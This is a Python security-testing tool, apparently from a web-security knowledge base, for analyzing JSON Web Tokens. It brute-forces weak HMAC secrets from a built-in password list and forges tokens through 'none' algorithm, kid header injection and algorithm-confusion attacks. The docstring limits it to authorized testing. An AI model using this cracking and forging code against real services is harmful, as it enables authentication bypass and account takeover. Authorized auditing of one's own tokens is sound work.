文件
websafe-kb/03-authentication/jwt/tools/jwt-cracker.py

417 行
13 KiB
Python

#!/usr/bin/env python3
"""
JWT Cracker & Analyzer
JWT 弱密钥破解与分析工具
支持:
- JWT 结构解析
- 弱密钥暴力破解
- none 算法攻击
- kid 注入攻击
- 密钥泄露检测
Usage:
python3 jwt-cracker.py -t "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
python3 jwt-cracker.py -t "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." -w wordlist.txt
python3 jwt-cracker.py -t "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." --attack none
授权边界:
- 仅用于分析你方签发的 JWT、测试环境样本或已明确授权的令牌
- 不应用于来源不明或无授权的第三方生产令牌
- 验证输出应纳入测试记录,避免在共享日志中暴露敏感载荷
"""
import argparse
import base64
import json
import hmac
import hashlib
import time
from typing import Dict, Optional, Tuple, List
import sys
import re
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
CYAN = "\033[96m"
END = "\033[0m"
BOLD = "\033[1m"
class JWTCracker:
def __init__(self):
self.common_secrets = [
"secret",
"password",
"123456",
"admin",
"key",
"jwt",
"token",
"secret123",
"password123",
"admin123",
"12345678",
"qwerty",
"letmein",
"welcome",
"monkey",
"dragon",
"master",
"login",
"abc123",
"111111",
"password1",
"iloveyou",
"trustno1",
"sunshine",
"princess",
"football",
"baseball",
"shadow",
"superman",
"michael",
"000000",
"654321",
"passw0rd",
"access",
"root",
"toor",
"guest",
"test",
"demo",
"default",
"changeme",
"server",
"api",
"private",
]
def print_result(self, level: str, msg: str):
colors = {
"INFO": Colors.BLUE,
"SUCCESS": Colors.GREEN,
"WARNING": Colors.YELLOW,
"ERROR": Colors.RED,
"FOUND": Colors.GREEN + Colors.BOLD,
}
print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}")
def base64url_decode(self, data: str) -> bytes:
"""Base64URL 解码"""
padding = 4 - len(data) % 4
if padding != 4:
data += "=" * padding
return base64.urlsafe_b64decode(data)
def base64url_encode(self, data: bytes) -> str:
"""Base64URL 编码"""
return base64.urlsafe_b64encode(data).rstrip(b"=").decode("utf-8")
def decode(self, token: str) -> Tuple[Dict, Dict, bytes]:
"""解码 JWT"""
try:
parts = token.split(".")
if len(parts) != 3:
raise ValueError("无效的 JWT 格式")
header = json.loads(self.base64url_decode(parts[0]))
payload = json.loads(self.base64url_decode(parts[1]))
signature = self.base64url_decode(parts[2])
return header, payload, signature
except Exception as e:
raise ValueError(f"JWT 解码失败: {e}")
def encode(
self, header: Dict, payload: Dict, secret: str = "", algorithm: str = "HS256"
) -> str:
"""编码 JWT"""
header_b64 = self.base64url_encode(
json.dumps(header, separators=(",", ":")).encode()
)
payload_b64 = self.base64url_encode(
json.dumps(payload, separators=(",", ":")).encode()
)
message = f"{header_b64}.{payload_b64}"
if algorithm.lower() == "none":
return f"{message}."
signature = self.sign(message, secret, algorithm)
signature_b64 = self.base64url_encode(signature)
return f"{message}.{signature_b64}"
def sign(self, message: str, secret: str, algorithm: str) -> bytes:
"""签名"""
algo_map = {
"HS256": hashlib.sha256,
"HS384": hashlib.sha384,
"HS512": hashlib.sha512,
}
if algorithm not in algo_map:
raise ValueError(f"不支持的算法: {algorithm}")
return hmac.new(secret.encode(), message.encode(), algo_map[algorithm]).digest()
def verify(self, token: str, secret: str) -> bool:
"""验证 JWT 签名"""
try:
header, payload, signature = self.decode(token)
algorithm = header.get("alg", "HS256")
parts = token.split(".")
message = f"{parts[0]}.{parts[1]}"
expected_sig = self.sign(message, secret, algorithm)
return hmac.compare_digest(signature, expected_sig)
except Exception:
return False
def crack(
self, token: str, wordlist: List[str] = None, verbose: bool = True
) -> Optional[str]:
"""暴力破解密钥"""
secrets = wordlist if wordlist else self.common_secrets
total = len(secrets)
if verbose:
self.print_result("INFO", f"开始破解 {total} 个密钥...")
start_time = time.time()
for i, secret in enumerate(secrets):
if verbose and i % 100 == 0:
print(
f"\r{Colors.CYAN}[*]{Colors.END} 进度: {i}/{total}",
end="",
flush=True,
)
if self.verify(token, secret):
if verbose:
print()
return secret
if verbose:
print()
return None
def attack_none_algorithm(self, token: str) -> str:
"""none 算法攻击"""
header, payload, _ = self.decode(token)
header["alg"] = "none"
return self.encode(header, payload, "", "none")
def attack_algorithm_confusion(self, token: str) -> str:
"""算法混淆攻击 (HS256 -> RS256)"""
header, payload, _ = self.decode(token)
header["alg"] = "HS256"
return self.encode(header, payload, "", "HS256")
def attack_kid_injection(self, token: str, injection: str = "/dev/null") -> str:
"""kid 注入攻击"""
header, payload, _ = self.decode(token)
header["kid"] = injection
return self.encode(header, payload, "", "HS256")
def analyze(self, token: str) -> Dict:
"""分析 JWT"""
try:
header, payload, signature = self.decode(token)
analysis = {
"header": header,
"payload": payload,
"algorithm": header.get("alg", "Unknown"),
"type": header.get("typ", "Unknown"),
"issues": [],
}
if header.get("alg") == "none":
analysis["issues"].append(
{
"severity": "HIGH",
"issue": "使用 none 算法",
"description": "JWT 使用 none 算法,无签名验证",
}
)
if header.get("alg") in ["HS256", "HS384", "HS512"]:
analysis["issues"].append(
{
"severity": "MEDIUM",
"issue": "使用对称加密",
"description": "使用 HMAC 算法,密钥可能被暴力破解",
}
)
sensitive_fields = ["password", "secret", "token", "key", "credit", "ssn"]
for field in sensitive_fields:
if field in str(payload).lower():
analysis["issues"].append(
{
"severity": "MEDIUM",
"issue": f"包含敏感字段: {field}",
"description": "Payload 可能包含敏感信息",
}
)
if "exp" in payload:
exp_time = payload["exp"]
if exp_time < time.time():
analysis["issues"].append(
{
"severity": "LOW",
"issue": "Token 已过期",
"description": f"过期时间: {time.ctime(exp_time)}",
}
)
else:
analysis["issues"].append(
{
"severity": "LOW",
"issue": "无过期时间",
"description": "Token 没有过期时间 (exp)",
}
)
return analysis
except Exception as e:
return {"error": str(e)}
def main():
parser = argparse.ArgumentParser(description="JWT Cracker & Analyzer")
parser.add_argument("-t", "--token", required=True, help="JWT Token")
parser.add_argument("-w", "--wordlist", help="密钥字典文件")
parser.add_argument(
"--attack", choices=["none", "kid", "confusion"], help="攻击类型"
)
parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值")
parser.add_argument("--analyze", action="store_true", help="分析 JWT")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args()
ensure_authorized(args, parser)
cracker = JWTCracker()
try:
header, payload, _ = cracker.decode(args.token)
if args.format == "text":
print(f"{Colors.CYAN}Header:{Colors.END}")
print(f" {json.dumps(header, indent=2)}")
print(f"\n{Colors.CYAN}Payload:{Colors.END}")
print(f" {json.dumps(payload, indent=2)}")
except Exception as e:
cracker.print_result("ERROR", str(e))
sys.exit(1)
analysis = cracker.analyze(args.token) if args.analyze else {"issues": []}
forged = None
if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
elif args.attack == "kid":
forged = cracker.attack_kid_injection(args.token, args.kid_injection)
elif args.attack == "confusion":
forged = cracker.attack_algorithm_confusion(args.token)
wordlist = None
if args.wordlist:
try:
with open(args.wordlist, "r") as f:
wordlist = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}")
sys.exit(1)
stdout_buffer = io.StringIO()
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
start = time.time()
with capture:
secret = cracker.crack(args.token, wordlist, args.verbose and args.format == "text")
elapsed = time.time() - start
if secret:
forged = cracker.encode(header, payload, secret, header.get("alg", "HS256"))
evidence_refs = []
ref = write_evidence(
args,
"jwt-analysis.json",
{
"header": header,
"payload": payload,
"analysis": analysis,
"attack": args.attack,
"secret_found": bool(secret),
"captured_stdout": stdout_buffer.getvalue()[-1000:],
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if secret or forged else "needs-review"
severity = "high" if secret else "medium" if analysis.get("issues") else "info"
report = make_report(
tool="jwt-cracker",
mode="jwt-analysis-and-weak-secret-test",
target="jwt-token",
status=status,
severity=severity,
payload_or_probe={
"header": header,
"payload_keys": sorted(payload.keys()),
"issues": analysis.get("issues", []),
"attack": args.attack,
"secret_found": bool(secret),
},
request_summary={"wordlist": args.wordlist or "builtin-common", "elapsed_seconds": round(elapsed, 2)},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
extra={"forged_token_present": bool(forged)},
)
text_lines = [
"=" * 60,
"JWT Cracker & Analyzer",
"=" * 60,
f"Token Alg: {header.get('alg', 'unknown')}",
f"Issues: {len(analysis.get('issues', []))}",
f"Secret Found: {'yes' if secret else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":
main()